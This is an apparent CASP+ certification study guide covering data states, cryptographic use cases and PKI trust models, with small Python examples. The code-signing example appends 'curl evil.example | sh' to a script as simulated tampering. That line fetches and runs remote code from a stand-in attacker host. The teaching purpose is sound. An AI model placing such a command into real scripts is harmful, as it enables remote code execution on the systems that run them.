CompTIA CASP+ CAS-004 – Cryptography (Domain 1) Part 2
January 10, 2023

5. Data States (OBJ 1.7)

When developing a security architecture to protect our data, it’s important to understand that people can access or modify data at any point during its life cycle. We normally break this concept down into one of three data states: Data at Rest, when data is being stored; Data in Use, when data is being processed, which can also be referred to as Data in Process; and Data in Transit, when data is being moved from one location to another. The first data state we have is known as Data at Rest. Whenever data is physically stored in a digital format, we’re going to call this Data at Rest. For example, if I save a file to a hard drive or a thumb drive, that data is at rest when it’s not being actively accessed.

Now, Data at Rest includes information stored in databases, backup files, mobile devices, and many other storage mediums. To protect Data at Rest, most systems rely on symmetric or asymmetric encryption algorithms, or they use a hybrid of those two types. Data at Rest encryption protections are going to be classified as disk-level, block-level, file-level, or record-level encryption. We use disk-level encryption to encrypt an entire volume or disk, which could be a partition or the entire hard drive. While disk-level encryption provides confidentiality for the entire disk, it does rely on a single encryption key for the whole disk, and it does slow down the boot and login processes on a system.

BitLocker for Windows and FileVault for Mac are examples of disk-level encryption technologies. Block-level encryption is similar to disk-level encryption, but we use it for virtual partitions and storage area networks. File-level encryption, on the other hand, encrypts individual files on a system. We can encrypt each file using the same key or a different key for each file, depending on your use case. For example, employees in my company can use their own encryption keys to protect their individual files prior to uploading them to our shared drive. That way, even if other employees can see our files on the shared drive, they can’t actually access or read them without our unique encryption key to decode them. The final type of Data at Rest encryption is known as record-level encryption.

This is useful in high-security databases where each individual record must be encrypted to prevent disclosures. Like file-level encryption, record-level encryption allows us to be very specific about which records are going to be encrypted and with which keys. Both file-level and record-level encryption allow us to encrypt a single file or record using a single key, but this still slows down the opening of the file or record, because it has to be decrypted whenever we need to access it. Now, the second data state we have is known as Data in Use, or Data in Process. Data in Use refers to any information that’s currently being processed or is about to be processed, and it’s therefore going to be located in the computer’s RAM or cache.

To help protect this data, Intel introduced automatic encryption of all data leaving the processor and stored in RAM through its Software Guard Extensions (SGX). Microsoft Windows can also encrypt data placed into RAM through its Data Protection API. Both of these techniques can help secure the data while it’s stored in RAM awaiting processing, or while it’s being processed by the central processing unit. The third data state we have is known as Data in Transit. If data is not currently being stored or processed, then the only other place it could be is in transit. Data in Transit, also known as Data in Motion, refers to information as it moves across a network or a system. To protect Data in Transit, encryption of the data or the data links needs to be utilized to protect the data’s confidentiality against network sniffing.

Now, Data in Transit protections include technologies like SSL, TLS, HTTPS, S-HTTP, SET, and 3-D Secure, as well as IPsec. SSL, the Secure Sockets Layer, and TLS, Transport Layer Security, are two protocols that allow us to create an encrypted tunnel between one system and another. We then use these protocols to maintain the confidentiality of the data while it’s in transit from the user’s system over to the server. Now, SSL and TLS can be used as an additional encryption layer for many other popular protocols too, including web, email, file transfer, authentication, and basically any other kind of traffic. Essentially, if you need to secure a protocol on the network, you can usually find a secure version of it that just relies on tunneling that protocol over an SSL or TLS tunnel.

HTTPS connections, for example, create a fully encrypted session between a web browser and the web server using either SSL or TLS. Secure HTTP, or S-HTTP, on the other hand, uses a different method to protect the data in transit. Instead of encrypting the entire session, S-HTTP encrypts each message individually. Because of this, we don’t often use S-HTTP; instead, HTTPS using an SSL or TLS tunnel is considered the default Data in Transit solution when you’re talking about web browsing. In the early adoption of the web and e-commerce, credit card companies wanted to ensure that credit card data in transit was properly secured.

To do this, Visa and Mastercard proposed the Secure Electronic Transaction, or SET, protocol, which relied on a system of digital certificates and asymmetric keys. Unfortunately, this system would have required full adoption by financial institutions and merchants, and so it never really gained widespread usage. Instead, most merchants still rely on HTTPS connections to create a secure method of payment. But in recent years, Verified by Visa and SecureCode by Mastercard were also added to e-commerce, and they provide additional levels of protection. Both of these rely on the 3-D Secure protocol, which is an XML-based protocol that provides additional security for payment card transactions done over HTTPS. Now, another form of Data in Transit protection relies on the IPsec protocol, or Internet Protocol Security.

This is a full suite of protocols that allows us to create a secure and encrypted tunnel between two different devices, commonly used for a VPN connection. Now, IPsec relies on an Authentication Header, or AH, that provides authentication and integrity during the tunnel’s creation. It also has an Encapsulating Security Payload, or ESP, that provides additional authentication and integrity, plus it maintains the confidentiality of the tunnel by using encryption. Finally, IPsec requires the use of a security association, known as an SA, which is the configuration on a device that’s needed to finalize the encrypted tunnel. We can use IPsec in either transport or tunnel mode.

With transport mode, IPsec only encrypts the payload of the data packets that are routed across the network. In tunnel mode, it creates an encrypted communication session where the payload, the routing information, and the header are all encrypted. Cryptography is often used as a universal solution when you’re adding confidentiality, privacy, integrity, or non-repudiation to a security architecture. So it’s really important to remember these three data states where you can apply cryptography in order to increase the security of your network, as well as the different techniques used with each of these three data states.
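To make the transport-versus-tunnel distinction concrete, here is a minimal conceptual sketch in Python. The XOR "encryption" is a deliberately toy stand-in for real ESP processing, and the header strings are made up for illustration only.

```python
def toy_encrypt(data: bytes) -> bytes:
    """Placeholder for ESP encryption: XOR each byte (NOT real cryptography)."""
    return bytes(c ^ 0x55 for c in data)

def transport_mode(ip_header: bytes, payload: bytes) -> bytes:
    # Transport mode: only the payload is encrypted; the IP header stays visible.
    return ip_header + toy_encrypt(payload)

def tunnel_mode(ip_header: bytes, payload: bytes) -> bytes:
    # Tunnel mode: the original header AND payload are both encrypted, and a
    # new outer header (added by the VPN gateway) handles the routing.
    return b"OUTER_HDR|" + toy_encrypt(ip_header + payload)

transport = transport_mode(b"SRC->DST|", b"secret data")
tunnel = tunnel_mode(b"SRC->DST|", b"secret data")
print(b"SRC->DST" in transport)  # True: inner routing info still readable
print(b"SRC->DST" in tunnel)     # False: the original header is hidden
```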

6. Cryptographic Use Cases (OBJ 1.7)

In this lesson, we’re going to discuss some different cryptographic use cases. There are several use cases that rely on implementing cryptography to add additional privacy, confidentiality, integrity, or non-repudiation, such as secure authentication, the use of smart cards, embedded systems, key escrow and key management, and mobile security. Secure authentication is used to recognize a user’s identity, and this often relies on cryptographic techniques. At its most basic, authentication uses a set of credentials, such as a username and a password, to authenticate and uniquely identify a user. But to secure this process, cryptographic technologies must be implemented. Otherwise, the user would be entering their username and password in plain text, and it would be sent to the server in plain text, where it could be intercepted by an attacker.

Also, if cryptography wasn’t used, the credentials of each user would be stored on the server in plain text, which again is a huge vulnerability. Thankfully, though, we have cryptography to help secure this process. One way we do this is by never storing the actual password in the server’s authentication systems or databases. Instead, when the user sets up their password, the system utilizes a non-reversible algorithm, like a hash function, to store a value that represents the user’s password rather than the actual password itself. Another way that cryptography is used to secure this process is to transmit the user’s credentials from the user to the server for validation through an encrypted tunnel using SSL or TLS.
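As a sketch of that idea, here is how a server might store and verify a password using only Python’s standard library. The salt size and iteration count are illustrative choices, not a production recommendation:

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """Derive a non-reversible hash; only the salt and hash are stored."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, stored):
    """Re-derive the hash from the supplied password and compare in constant time."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("wrong guess", salt, stored))                   # False
```

Because PBKDF2 is deliberately slow and one-way, an attacker who steals the stored values still cannot recover the original password directly.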

In most modern networks, we rarely rely on a single factor of authentication either, so we don’t use just a simple username and password combination. Instead, we use something more secure, like multifactor authentication, where we combine two or more factors to uniquely identify a user. Now, if an organization is using an authenticator application or an RSA key fob that provides a new random number every 30 to 60 seconds, and that acts as a secret PIN, this is actually a form of cryptography too, because it’s creating those one-time-use codes through an algorithm. Now, maybe your organization relies on a smart card and a PIN for its two-factor authentication.
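Those rotating codes are typically generated with the time-based one-time password (TOTP) algorithm from RFC 6238, which HMACs a shared secret together with the current 30-second time window. A minimal standard-library sketch, using the shared secret from the RFC’s own test vectors:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, timestamp=None, step=30, digits=6):
    """Generate a time-based one-time code (RFC 6238 style, HMAC-SHA1)."""
    key = base64.b32decode(secret_b32)
    counter = int((timestamp if timestamp is not None else time.time()) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test secret "12345678901234567890" in Base32; at T=59s the
# expected 8-digit code is 94287082.
SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
print(totp(SECRET, timestamp=59, digits=8))  # 94287082
```

Both the fob and the server hold the same secret, so they independently compute the same short-lived code without ever transmitting the secret itself.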

If this is the case, those cryptographic keys are actually stored on the smart card itself, and they’re going to be unlocked when you enter your PIN, accessed, and then presented to the system for authentication. Embedded systems are another use case for cryptography too. An embedded system is any system that contains both the hardware and software necessary to perform a dedicated function, either independently or as part of a larger system. For example, in a manufacturing facility you’re going to find a lot of different embedded systems as part of its ICS and SCADA networks. Hashing is commonly used with these embedded systems to provide integrity checking of the messages being sent and received by these different systems. This is important because many of these embedded systems are used to conduct actions on real-world equipment, like generating power at a power plant or opening and closing valves to control the water levels near a dam.
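As a sketch of that integrity checking, here is a Python example that appends an HMAC tag to each command using a pre-shared key; the key value and command format are hypothetical:

```python
import hashlib
import hmac

SHARED_KEY = b"example-preshared-key"  # hypothetical key both devices hold

def tag_command(command):
    """Append an HMAC tag so the receiver can verify integrity and origin."""
    tag = hmac.new(SHARED_KEY, command, hashlib.sha256).hexdigest().encode()
    return command + b"|" + tag

def verify_command(message):
    """Recompute the HMAC over the command and compare it to the attached tag."""
    command, _, tag = message.rpartition(b"|")
    expected = hmac.new(SHARED_KEY, command, hashlib.sha256).hexdigest().encode()
    return hmac.compare_digest(tag, expected)

msg = tag_command(b"OPEN_VALVE 10")
print(verify_command(msg))                         # True: message intact
print(verify_command(msg.replace(b"10", b"100")))  # False: tampering detected
```

A tampered command (say, changing 10% to 100%) no longer matches its tag, so the receiving controller can reject it before acting on real-world equipment.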

There’s a big difference between executing a command that says open the valve 10% and one that says open it 100% when you’re dealing with hundreds of thousands of gallons of water, right? So we want to make sure we get it right. An improper command being executed can have devastating results, such as flooding the towns downstream of that dam by opening the valve too much. So for better security, many of these embedded systems will implement either symmetric or asymmetric encryption to protect their data as it travels across a given network. But the challenge with embedded systems is that many of them are very, very old, and they cannot support the latest encryption schemes.

It is still very common to find embedded systems using DES for encryption, even though it was initially fielded back in the 1970s, nearly 50 years ago. Next, let’s discuss key escrow and key management. Key escrow is an arrangement in which the keys needed to decrypt encrypted data are held in escrow so that an authorized third party can gain access to those keys under certain circumstances. Key management, on the other hand, is responsible for administering the full lifecycle of cryptographic keys, from generation to usage to storage to archiving to deletion. Key escrow is just one part of this key management concept and part of the overall life cycle.

When it comes to key escrow, it’s imperative that the system that escrows the keys is properly secured and encrypted itself. Many key escrow systems are designed to split an escrowed key into separate pieces, with each piece stored on a different system; this helps prevent exploitation. When the key is needed, those parts are recombined and decrypted, and that provides you with the original key again. Finally, we have mobile security. As our organizations become more and more mobile, we have to consider the challenges with these mobile devices too. Remember, encryption can be pretty processor intensive. Now, most mobile devices are going to support full storage encryption by using Data at Rest encryption.
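The splitting itself can be as simple as XOR-based secret sharing: combine the key with a random value, then store the random value as one share and the XOR result as the other. Neither share alone reveals anything about the key. A minimal sketch:

```python
import secrets

def split_key(key):
    """Split a key into two shares; both are required to recover it."""
    share1 = secrets.token_bytes(len(key))           # pure randomness
    share2 = bytes(a ^ b for a, b in zip(key, share1))
    return share1, share2

def recombine(share1, share2):
    """XOR the shares back together to recover the original key."""
    return bytes(a ^ b for a, b in zip(share1, share2))

original = secrets.token_bytes(32)
s1, s2 = split_key(original)
print(recombine(s1, s2) == original)  # True
```

Real escrow systems often use more elaborate threshold schemes (e.g., requiring any k of n shares), but the principle of "no single system holds the whole key" is the same.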

This usually relies on a symmetric algorithm like AES, the Advanced Encryption Standard. Now, when it comes to asymmetric encryption on mobile devices, though, we often use mobile-specific algorithms. This is because mobile devices have less processing power than desktops, laptops, or servers. Unfortunately, security and encryption require additional processor overhead, and therefore many of the traditional methods of encryption are simply going to be too processor intensive for these devices. To overcome this processor limitation, we can use ECC. ECC is elliptic curve cryptography, and it’s a form of public key cryptography based upon the algebraic structure of elliptic curves over a finite field.

Basically, instead of relying on real numbers and complex mathematics to encrypt the data, ECC instead uses points on a graph that satisfy a single algebraic formula. Because of this method, ECC can create equivalent levels of security using much smaller keys that require less processing power. For example, a 256-bit elliptic curve public key is equivalent in strength to a 3072-bit RSA public key. ECC refers to its key sizes as P-256, P-384, and P-521, equating to the number of bits in their respective keys. So, as you can see, there are a lot of different use cases that are going to rely on implementing cryptography to add additional privacy, confidentiality, integrity, or non-repudiation to our systems, such as secure authentication, smart cards, embedded systems, key escrow and key management, and mobile security.
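As a toy illustration of what "points that satisfy a single algebraic formula" means, here is a sketch using a deliberately tiny curve; real curves like P-256 use primes hundreds of bits long, so these numbers are for demonstration only:

```python
# Toy curve: y^2 = x^3 + 2x + 2 (mod 17). Real ECC uses enormous primes.
p, a, b = 17, 2, 2

def on_curve(x, y):
    """A point (x, y) is valid only if it satisfies the curve equation mod p."""
    return (y * y) % p == (x ** 3 + a * x + b) % p

print(on_curve(5, 1))  # True:  1^2 = 1 and 5^3 + 2*5 + 2 = 137 = 1 (mod 17)
print(on_curve(5, 2))  # False: 2^2 = 4, which doesn't match
```

ECC keys and signatures are built from repeated point operations on curves like this one, which is why equivalent security fits into far fewer bits than RSA.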

7. PKI Use Cases (OBJ 1.7)

In this lesson, we’re going to discuss some different PKI use cases. There are several use cases that rely on implementing PKI to add additional privacy, confidentiality, integrity, or non-repudiation, such as web services, email, code signing, federation, trust models, VPNs, and enterprise and security automation and orchestration. These use cases all rely on the fact that PKI supports the use of public and private key pairs. The public key is used to encrypt data that must remain private or confidential, since only the receiver’s private key can open that data. The private key is used when integrity and non-repudiation are our priority, since we can hash the data to ensure integrity and encrypt that hash digest with our own private key to ensure non-repudiation by using a digital signature. Let’s do a quick review of the various use cases and how the use of PKI can help us achieve these goals. First, we have web services.

Now, a web service is any piece of software that makes itself available over the Internet and uses a standardized XML messaging system, with XML used to encode all communications to the web service. Every website and web service that uses HTTPS to communicate is going to rely on public key infrastructure in order to create its secure connections. So when you build a website, a web service, or a web app, you need to install a digital certificate on your web server, along with the private key from its public/private key pair. Now, the public key will remain available from a trusted central repository for all of your end users. This public key will then be used by those end users to send your server a unique random number string that will serve as a session key for an encrypted SSL or TLS session between the client and your server.
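On the client side, Python’s standard-library `ssl` module builds a context that performs exactly this certificate validation against the system’s trusted roots. The hostname in the commented usage is purely illustrative:

```python
import socket
import ssl

# A default client context validates the server's certificate chain against
# the system's trusted root CAs and checks the certificate's hostname.
context = ssl.create_default_context()
print(context.verify_mode == ssl.CERT_REQUIRED)  # True: cert must validate
print(context.check_hostname)                    # True: name must match

# Illustrative usage (not executed here): wrap a TCP socket in TLS.
# with socket.create_connection(("example.com", 443)) as sock:
#     with context.wrap_socket(sock, server_hostname="example.com") as tls:
#         print(tls.version())  # e.g. "TLSv1.3"
```

The key design point is that certificate validation and hostname checking are on by default, so a failed chain or mismatched name raises an error instead of silently connecting.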

PKI can also be used by web services to conduct authentication. In these cases, a user’s private key can be used to encrypt a challenge from the server, which is then returned to prove the user’s identity. Since the server can decrypt the challenge received from the user by using the user’s publicly available public key, it can validate that the user is who they claim to be, because only the user has access to the private key in a PKI system. Second, we have email. Email messages can be encrypted with the public key of the receiver to ensure confidentiality and privacy. To ensure integrity, the sender hashes the email message and gives that hash to the receiver. To ensure non-repudiation, the sender of the email encrypts the hash digest they calculated with their own private key. Now, only the receiver can read the message, because it was encrypted with the receiver’s public key, but anyone in the world can read the hash digest, since it was encrypted with the sender’s private key.

This is acceptable because the hash digest cannot be reversed into the initial message; instead, it’s considered a one-way cryptographic function. Third, we have code signing. Code signing is the process of digitally signing executables and scripts to confirm the software was written by the author, and it guarantees the code has not been altered or corrupted since it was digitally signed. The process employs the use of cryptographic hashes to validate the authenticity and integrity of the code. Code signing works just like digitally signing an email: the code developer’s private key is used to encrypt the hash digest of the finished executable file or script as a means of providing non-repudiation for that code, proving it was actually released by the developer and has not changed since it was signed.
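Here is a sketch of the hashing half of that flow using the standard library. The filename is hypothetical, and the actual signing step (encrypting the digest with the developer’s private key) is only described in comments, since it requires an asymmetric crypto library:

```python
import hashlib

def file_digest(path):
    """Hash the finished executable/script; this digest is what gets signed."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

# In a real code-signing flow, the developer encrypts this digest with their
# private key; verifiers decrypt the signature with the developer's public
# key and compare digests. Here we just show that any change to the file
# changes the digest, which is what makes tampering detectable.
with open("release.sh", "w") as f:   # hypothetical script name
    f.write("echo deploy\n")
before = file_digest("release.sh")
with open("release.sh", "a") as f:
    f.write("curl evil.example | sh\n")   # simulated tampering
print(file_digest("release.sh") != before)  # True
```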

Fourth, we have federation. Now, federations are used to link a user’s electronic identity and attributes, stored across multiple distinct identity management systems, into one. In the world of PKI, this is accomplished by creating a multilevel hierarchy of trust called a certificate chain. As you trace the chain upwards, you’re going to eventually reach a root certificate authority from which all trust is ultimately derived. Because of the size and scope of the Internet and its associated identity systems, these multilevel hierarchy chains are often interlinked with other chains to create a federation. While federations don’t have to rely on PKI, they often do for much higher levels of security.
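Conceptually, tracing a certificate chain means following each certificate’s issuer upward until you hit a self-signed root. A simplified sketch with hypothetical certificate names:

```python
# Hypothetical issuer links: each certificate names the CA that signed it;
# a root CA signs itself, which is where all trust ultimately derives from.
issued_by = {
    "www.example.com": "Intermediate CA",
    "Intermediate CA": "Root CA",
    "Root CA": "Root CA",  # self-signed root
}

def chain_to_root(subject):
    """Walk the issuer links upward until a self-signed certificate is reached."""
    chain = [subject]
    while issued_by[chain[-1]] != chain[-1]:
        chain.append(issued_by[chain[-1]])
    return chain

print(chain_to_root("www.example.com"))
# ['www.example.com', 'Intermediate CA', 'Root CA']
```

Real chain validation also checks each certificate’s signature, validity dates, and revocation status at every hop, but the upward walk to a trusted root is the same shape.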

This would involve using digital certificates for authentication inside the federation instead of just using simple username and password combinations. Fifth, we have trust models. Now, a trust model is a collection of rules that informs how applications can decide on the legitimacy of a digital certificate. Within PKI, there are operations and security policies, as well as security services and protocols, that all need to support interoperability by using public key encryption and key management certificates. There are five different trust models that are used in PKI: peer-to-peer, bridge certificate authority, hierarchical, hybrid, and web of trust.

The peer-to-peer trust model does not rely on a centralized, trusted root certificate authority. Instead, the peer-to-peer model allows certificate users to rely on their own local CAs as the starting point of trust. When a user needs to validate another user’s certificate, they reach out to their local CA, and if that local CA has a bidirectional trust set up with the other user’s local CA, it’s going to be able to validate it. This is known as cross-certification, and it only works well with a small number of groups, because there’s no hierarchy involved here. Now, a bridge certificate authority model is used to support PKI applications across enterprises and avoid having to create numerous cross-certification connections. Instead, each local CA can cross-connect to a central bridge CA, and that bridge CA can maintain all the bilateral agreements with all the other organizations’ local CAs on your behalf.

This model works a lot like a star topology in networking, where all the nodes connect back to a central bridge CA and can then be redirected over to the proper local CA for the user certificate that needs validation. This helps add some hierarchy to the system without requiring a centralized CA that’s trusted by everyone, because the central node here is simply a bridge that works almost like a switch, connecting each user to the proper authenticating CA through that bidirectional trust. Next, we have the hierarchical trust model, and this requires a centralized root node as a starting point for all trust in the PKI system. This model is usually going to be used internally for domain environments.

If there’s a large network involved, the root CA can also connect to direct descendants, and those descendants can further connect downward to more, depending on the network size. In a hierarchical trust model, every single node must trust the root CA as the source of its own authority as well. The hybrid trust model combines two or more of the models we just discussed. For example, you could have two organizations that each use a hierarchical trust model inside their own networks, but if they want to connect the two together, they could do this by implementing a bridge model, allowing each organization to reach out to the other through the organizations’ root CAs via that bilateral trust agreement.

The final model we have is known as a web of trust. This is a decentralized security model in which the participants are able to authenticate the identities of the other users. This concept is used with the PGP (Pretty Good Privacy), GnuPG, and OpenPGP encryption methods, and it is not commonly used in PKI. In fact, the web of trust is pretty much the opposite of the more centralized PKI models that we just discussed. Sixth, we have VPNs. Now, a VPN, or virtual private network, extends a private network across a public network and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.

PKI is often used in conjunction with VPNs to provide authentication for remote users who are connecting to a network over a VPN. Seventh, we have enterprise and security automation and orchestration. Automation and orchestration is the automated configuration, management, and coordination of computer systems, applications, and services. Orchestration helps information technology professionals more easily manage complex tasks and workflows. Automation and orchestration are essential in the implementation of PKI these days: as more servers and assets are moved into the cloud, and PKI and digital certificates are used more and more for authentication of these devices, we must use automation and orchestration to issue and implement the digital certificates across all of these devices.

After all, if we’re rapidly creating cloud-based servers to meet our elastic demands and then removing or destroying those virtual servers, we need to be able to create, distribute, and revoke or destroy all of the digital certificates for those virtual servers whenever they’re deprovisioned. By using orchestration and automation, we can do that. It can help simplify, centralize, and streamline all of the digital certificate and cryptographic key tasks, from discovery and inventory to renewals, revocations, installations, monitoring, and much more. This also provides you with simplified and consistent visibility and control over PKI by centralizing your certificate and key lifecycle management functions.
